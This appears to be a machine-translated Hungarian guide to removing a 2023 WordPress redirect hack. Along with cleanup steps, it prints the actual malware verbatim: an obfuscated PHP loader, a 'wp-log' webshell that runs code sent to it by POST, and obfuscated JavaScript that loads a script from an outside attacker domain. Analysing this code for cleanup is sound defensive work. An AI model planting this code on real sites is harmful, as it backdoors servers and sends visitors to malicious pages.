Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress határozottan ez a leggyakrabban használt platform CMS (Content Management System) blogokhoz és kezdő webáruházakhoz egyaránt (a modullal WooCommerce), ami a számítógépes támadások (hackelés) által leginkább célponttá teszi. Az egyik leggyakrabban használt hackelési művelet célja a feltört webhely átirányítása más weboldalakra. Redirect WordPress Hack A 2023 egy viszonylag új rosszindulatú program, amely a teljes webhelyet spam weboldalakra irányítja át, illetve megfertőzheti a felhasználók számítógépeit.

Ha webhelye tovább fejlődött WordPress átirányítja egy másik oldalra, akkor nagy valószínűséggel a már híres átirányítási hack áldozata.

Ebben az oktatóanyagban megtalálja a szükséges információkat és hasznos tippeket, amelyek segítségével vírusmentesítheti az átirányítással fertőzött webhelyeket. WordPress Hack (Virus Redirect). A megjegyzésekben további információkat kaphat, vagy segítséget kérhet.

A webhelyeket átirányító vírus észlelése WordPress

A weboldal forgalmának hirtelen és indokolatlan csökkenése, a rendelések számának csökkenése (internetes áruházak esetében) vagy a reklámbevételekben az első jele annak, hogy valami nincs rendben. Felismerés "Redirect WordPress Hack 2023” (Vírusátirányítás) „vizuálisan” is elvégezhető, amikor megnyitjuk a webhelyet, és átirányítunk egy másik weboldalra.

Tapasztalat szerint a legtöbb internetes rosszindulatú program kompatibilis az internetböngészőkkel: Chrome, Firefox, Edge, Opera. Ha Ön számítógép-felhasználó Mac, ezek a vírusok nem igazán látszanak a böngészőben Safari. Biztonsági rendszer től Safari csendben blokkolja ezeket a rosszindulatú szkripteket.

Mi a teendő, ha egy webhely fertőzött Redirect WordPress Hack

Remélem, az első lépés nem a pánik vagy a webhely törlése. Még a fertőzött vagy vírusos fájlokat sem szabad először törölni. Értékes információkat tartalmaznak, amelyek segíthetnek megérteni, hol található a biztonsági rések, és mi érintette a vírust. Működési módja.

Zárja be a weboldalt a nyilvánosság elől.

Hogyan zárhat be egy vírusos webhelyet a látogatók elől? A legegyszerűbb a DNS-kezelő használata, és az "A" (a tartománynév) IP-címének törlése, vagy nem létező IP-cím meghatározása. Így a weboldal látogatói védettek lesznek ettől redirect WordPress hack ami vírus vagy SPAM weboldalakra vezetheti őket.

Ha használ CloudFlare DNS-kezelőként bejelentkezik a fiókba, és törli a DNS-rekordokat "A” a domain névhez. Így a vírus által érintett domain IP-cím nélkül marad, az internetről többé nem érhető el.

Kimásolod a weboldal IP-jét, és úgy "irányítod", hogy csak te érhesd el. A számítógépéről.

Hogyan lehet megváltoztatni egy webhely valódi IP-címét számítógépeken Windows?

A módszert gyakran használják bizonyos webhelyekhez való hozzáférés blokkolására a "hosts" fájl szerkesztésével.

1. Kinyitod Notepad vagy más szövegszerkesztő (jogokkal administrator) és szerkessze a fájlt "hosts". Található:

C:\Windows\System32\drivers\etc\hosts

2. A "hosts" fájlban adja hozzá az "útvonal" szót webhelye valódi IP-címéhez. Az IP fent törölve a DNS-kezelőből.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Mentse el a fájlt, és nyissa meg a webhelyet a böngészőben.

Ha a webhely nem nyílik meg, és nem tettél semmi rosszat a "hosts" fájlban, akkor valószínűleg DNS-gyorsítótárról van szó.

A DNS-gyorsítótár törlése operációs rendszeren Windows, nyisd ki Command Prompt, ahol lefuttatja a parancsot:

ipconfig /flushdns

Hogyan lehet megváltoztatni egy webhely valódi IP-címét számítógépeken Mac / MacKönyv?

Számítógép-felhasználók számára Mac valamivel egyszerűbb megváltoztatni egy webhely valódi IP-címét.

1. Nyissa meg a segédprogramot Terminal.

2. Futtassa a parancssort (a futtatáshoz rendszerjelszó szükséges):

sudo nano /etc/hosts

3. Ugyanaz, mint a számítógépeknél Windows, adja hozzá a domain valódi IP-címét.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Mentse el a változtatásokat. Ctrl+X (y).

Az „útválasztás” után Ön az egyetlen személy, akivel hozzáférhet a fertőzött webhelyhez Redirect WordPress Hack.

A webhely teljes biztonsági mentése – Fájlok és adatbázisok

Még akkor is, ha fertőzöttredirect WordPress hack”, azt javasoljuk, hogy készítsen általános biztonsági másolatot a teljes webhelyről. Fájlok és adatbázis. Esetleg mindkét fájl helyi másolatát is mentheti public / public_html valamint az adatbázist.

A fertőzött és a által módosított fájlok azonosítása Redirect WordPress Hack 2023

A fő célfájlok a WordPress vannak index.php (a gyökérben), header.php, index.php şi footer.php a témáról WordPress eszközöket. Manuálisan ellenőrizze ezeket a fájlokat, és azonosítsa a rosszindulatú kódot vagy a rosszindulatú programszkriptet.

2023-ban egy vírus a „Redirect WordPress Hack” tette be index.php az űrlap kódja:

(Nem javaslom ezeknek a kódoknak a futtatását!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekódolva, ez rosszindulatú script ez alapvetően a webhely fertőzöttségének a következménye WordPress. Nem a rosszindulatú program mögött álló szkript, hanem az a szkript, amely lehetővé teszi a fertőzött weboldal átirányítását. Ha dekódoljuk a fenti szkriptet, a következőket kapjuk:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

A kiszolgálón található összes, ezt a kódot tartalmazó fájl azonosításához jó, ha rendelkezik hozzáféréssel SSH a kiszolgálóra a fájlellenőrzési és -kezelési parancssorok futtatásához Linux.

Kapcsolódó: Segítség segítségével megtudhatja, hogy blogja fertőzött-e vagy sem Google Search . (WordPress Vírus)

Az alábbiakban két olyan parancs található, amelyek mindenképpen hasznosak a nemrég módosított fájlok és egy bizonyos kódot (karakterláncot) tartalmazó fájlok azonosításához.

Hogy látod tovább Linux A PHP-fájlok az elmúlt 24 órában vagy más időkeretben változtak?

Rendelés "find” nagyon egyszerűen használható, és lehetővé teszi a testreszabást az időtartam, a keresési útvonal és a fájlok típusának beállításához.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

A kimenetben információkat kap a fájl módosításának dátumáról és időpontjáról, az írási / olvasási / végrehajtási engedélyekről (chmod) és melyik csoporthoz/felhasználóhoz tartozik.

Ha több nappal ezelőtt szeretne ellenőrizni, módosítsa a "-mtime -1" vagy használja a "-mmin -360” percekig (6 óráig).

Hogyan keressünk kódot (karakterláncot) PHP, Java fájlokon belül?

A "find" parancssor, amely lehetővé teszi, hogy gyorsan megtalálja az összes olyan PHP vagy Java fájlt, amely egy bizonyos kódot tartalmaz, a következő:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

A parancs megkeresi és megjeleníti a fájlokat .php şi .js tartalmaz "uJjBRODYsU".

A fenti két parancs segítségével nagyon könnyen megtudhatja, mely fájlok módosultak a közelmúltban, és melyek tartalmaznak rosszindulatú programkódot.

Eltávolítja a rosszindulatú kódot a módosított fájlokból anélkül, hogy veszélyeztetné a helyes kódot. Az én forgatókönyvem szerint a rosszindulatú programot a megnyitás előtt helyezték el <head>.

Az első "find" parancs végrehajtásakor nagyon lehetséges olyan új fájlok felfedezése a szerveren, amelyek nem az Önéi WordPress sem te tetted oda. Vírustípushoz tartozó fájlok Redirect WordPress Hack.

Az általam vizsgált forgatókönyvben a következő formátumú fájlok:wp-log-nOXdgD.php". Ezek "spawn" fájlok, amelyek a vírus által átirányításra használt rosszindulatú programkódot is tartalmaznak.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

A " típusú fájlok céljawp-log-*” célja az átirányítási hackvírus terjesztése a szerveren tárolt más webhelyekre. Ez egy "" típusú rosszindulatú programkódwebshell” alkotja a alapszakasz (amelyben néhány titkosított változó definiálva van) és o végrehajtási szakasz amelyen keresztül a támadó rosszindulatú kódot próbál betölteni és végrehajtani a rendszeren.

Ha van változó POST nevezett 'bh' és annak titkosított értéke MD5 egyenlő "8f1f964a4b4d8d1ac3f0386693d28d03", akkor úgy tűnik, hogy a szkript írja a titkosított tartalmat base64 egy másik, 'b3' egy ideiglenes fájlba, majd megpróbálja belefoglalni ezt az ideiglenes fájlt.

Ha van változó POST vagy GET nevezett 'tick', a szkript az értékkel válaszol MD5 a húrból"885".

A kiszolgálón lévő összes, ezt a kódot tartalmazó fájl azonosításához válasszon egy közös karakterláncot, majd futtassa a "find” (hasonlóan a fentihez). Törölje az összes fájlt, amely tartalmazza ezt a rosszindulatú programkódot.

Biztonsági hibát használt ki Redirect WordPress Hack

Valószínűleg ez az átirányító vírus ezen keresztül érkezik az adminisztrációs felhasználó kihasználása WordPress vagy azonosítva a sebezhető bővítmény amely lehetővé teszi a felhasználók hozzáadását a következő jogosultságokkal: administrator.

A legtöbb platformra épített webhelyhez WordPress lehetséges téma vagy beépülő fájlok szerkesztéseaz adminisztrációs felületről (Dashboard). Így egy rosszindulatú személy rosszindulatú programkódot adhat a témafájlokhoz, hogy létrehozza a fent látható szkripteket.

Ilyen rosszindulatú programkód például a következő:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript a téma fejlécében azonosítva WordPress, közvetlenül a címke felnyitása után <head>.

Elég nehéz megfejteni ezt a JavaScriptet, de nyilvánvaló, hogy egy másik webcímet kérdez le, ahonnan nagy valószínűséggel más szkripteket is lekér a fájlok létrehozásához "wp-log-*” amiről fentebb beszéltem.

Keresse meg és törölje ezt a kódot az összes fájlból PHP érintett.

Amennyire meg tudtam állapítani, ez a kód volt manuálisan hozzáadva egy új, rendszergazdai jogosultságokkal rendelkező felhasználó által.

Ezért a rosszindulatú programok irányítópultról történő hozzáadásának megakadályozása érdekében a legjobb, ha letiltja a szerkesztési lehetőséget WordPress Témák / beépülő modulok az irányítópultról.

Szerkessze a fájlt wp-config.php és add hozzá a sorokat:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

A módosítás után nincs felhasználó WordPress többé nem szerkesztheti a fájlokat az irányítópultról.

Ellenőrizze a felhasználókat a szerepkörrel Administrator

Az alábbiakban látható egy SQL-lekérdezés, amellyel a szerepkörrel rendelkező felhasználókat kereshet administrator az emelvényen WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ez a lekérdezés a táblázat összes felhasználóját visszaadja wp_users aki kiosztotta a szerepét administrator. A lekérdezés a táblára is megtörténik wp_usermeta metaban keresniwp_capabilities', amely információkat tartalmaz a felhasználói szerepkörökről.

Egy másik módszer az, hogy azonosítsa őket: Dashboard → Users → All Users → Administrator. Vannak azonban olyan gyakorlatok, amelyekkel a felhasználó elrejthető az Irányítópult panelen. Tehát a legjobb módja a felhasználók megtekintésének "Administrator"In WordPress a fenti SQL parancs.

Az én esetemben az adatbázisban azonosítottam a felhasználót a következő néven:wp-import-user". Eléggé szuggesztív.

Szintén innen láthatja a felhasználó dátumát és időpontját WordPress elkészült. A felhasználói azonosító is nagyon fontos, mert a szerver naplóiban keres. Így láthatja a felhasználó összes tevékenységét.

A szerepkörrel rendelkező felhasználók törlése administrator amit akkor nem tudsz jelszavakat módosítani minden adminisztratív felhasználó számára. Szerkesztő, Szerző, Administrator.

Módosítsa az SQL adatbázis felhasználó jelszavát az érintett webhelyről.

Ezen lépések megtétele után a webhely minden felhasználó számára újraindítható.

Ne feledje azonban, hogy amit fent bemutattam, az egyike annak a több ezer forgatókönyvnek, amelyben egy webhely megfertőződik Redirect WordPress Hack 2023-ban.

Ha webhelye megfertőződött, és segítségre van szüksége, vagy bármilyen kérdése van, a megjegyzések szakasz megnyílik.